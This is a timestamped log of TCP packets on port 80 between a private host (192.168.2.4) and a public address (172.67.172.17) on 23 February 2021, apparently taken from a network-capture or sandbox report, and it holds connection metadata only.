Feb 23, 2021 15:30:32.977605104 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.978301048 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.978367090 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.978413105 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.978452921 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.978526115 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.979191065 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.979237080 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.979274988 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.979317904 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.979356050 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.980017900 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.980062008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.980101109 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.980171919 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.980901003 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.980946064 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.980966091 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.980987072 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.981133938 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.981631041 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.981677055 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.981714964 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.981921911 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.982485056 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.982532978 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.982574940 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.982597113 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.982646942 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.983225107 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.983268023 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.983306885 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.983351946 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.984047890 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.984102964 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.984148026 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.984189034 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.984217882 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.984761000 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.984803915 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.984843969 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.984946966 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.985559940 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.985604048 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.985644102 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.985651016 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.985713959 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.986332893 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.986387968 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.986428976 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.986507893 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.987267017 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.987297058 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.987344980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.987345934 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.987420082 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.987750053 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.987783909 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.987807989 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.987831116 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.987878084 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.987907887 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.988754034 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.988780975 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.988805056 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.988827944 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.988859892 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.988907099 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.989738941 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.989763975 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.989803076 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.989830017 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.989852905 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.989897966 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.990673065 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.990700960 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.990727901 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.990752935 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.990863085 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.991621971 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.991650105 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.991677046 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.991703033 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.991725922 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.991779089 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.992562056 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.992597103 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.992625952 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.992652893 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.992660999 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.992711067 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.993654013 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.993690014 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.993715048 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.993746996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.993772984 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.993837118 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.994405985 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.994435072 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.994462967 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.994488955 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.994503975 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.994550943 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.995403051 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.995430946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.995456934 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.995481968 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.995518923 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.995585918 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.996227980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.996267080 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.996299028 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.996325016 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.996352911 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.996407032 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.997109890 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.997138977 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.997164965 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.997196913 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.997237921 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.997282028 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.998063087 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.998091936 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.998119116 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.998146057 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.998182058 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.998209953 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.998930931 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.998971939 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.999000072 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.999025106 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.999125004 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.999789953 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.999833107 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.999860048 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.999892950 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.999936104 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.999974012 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.000720024 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.000756979 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.000786066 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.000813007 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.000888109 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.001615047 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.001646996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.001673937 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.001701117 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.001722097 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.001821995 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.002487898 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.002517939 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.002538919 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.002559900 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.002670050 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.003417969 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.003448963 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.003475904 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.003529072 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.003581047 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.003607035 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.004308939 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.004338980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.004371881 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.004424095 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.004435062 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.004508018 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.005189896 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.005219936 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.005249977 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.005278111 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.005336046 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.005403042 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.005866051 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.005897999 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.005924940 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.005956888 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.005986929 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.005990982 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.006083965 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.006735086 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.006763935 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.006797075 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.006827116 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.006848097 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.006861925 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.006932974 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.007590055 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.007623911 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.007651091 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.007683992 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.007693052 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.007707119 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.007805109 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.008431911 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.008477926 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.008506060 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.008522987 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.008532047 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.008568048 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.008596897 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.008655071 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.009284973 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.009314060 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.009347916 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.009377956 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.009409904 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.009423018 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.009450912 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.010144949 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.010174036 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.010202885 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.010232925 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.010234118 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.010262966 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.010288000 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.010358095 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.011034012 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.011065960 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.011095047 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.011126041 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.011152983 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.011220932 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.011276960 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.011893988 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.011986017 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.012013912 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.012051105 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.012084007 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.012105942 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.012149096 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.012231112 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.012804031 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.012836933 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.012872934 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.012907982 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.012927055 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.012939930 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.012993097 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.013582945 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.013621092 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.013653040 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.013674021 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.013741016 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.014107943 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.014148951 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.014183044 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.014246941 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.014252901 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.014285088 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.014334917 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.014972925 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.015005112 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.015033960 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.015078068 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.015129089 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.015774965 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.015808105 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.015850067 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.015887022 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.015897989 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.015940905 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.015958071 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.016767025 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.016799927 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.016829014 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.016849041 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.016856909 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.016880035 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.016885996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.016952038 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.018985033 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.019035101 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.019071102 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.019113064 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.019133091 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.019150972 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.019186020 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.020076990 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.020126104 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.020174026 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.020174026 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.020219088 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.020235062 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.020261049 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.020535946 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.020560980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.020581961 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.020601034 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.020617008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.020621061 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.020689964 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.021604061 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.021625996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.021642923 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.021660089 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.021677017 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.021703959 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.021766901 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.022314072 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.022341013 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.022363901 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.022386074 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.022404909 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.022422075 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.022471905 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.022962093 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.022979975 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.022998095 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.023015022 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.023030996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.023031950 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.023091078 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.023777008 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.023796082 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.023808956 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.023828983 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.023847103 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.023874998 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.023901939 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.024651051 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.024673939 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.024692059 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.024738073 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.024781942 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.025099039 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.025119066 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.025140047 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.025155067 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.025182009 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.025201082 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.025252104 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.025943995 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.025968075 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.025988102 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.026009083 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.026026011 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.026036978 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.026072025 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.026098013 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.026742935 CET	80	49737	172.67.172.17	192.168.2.4
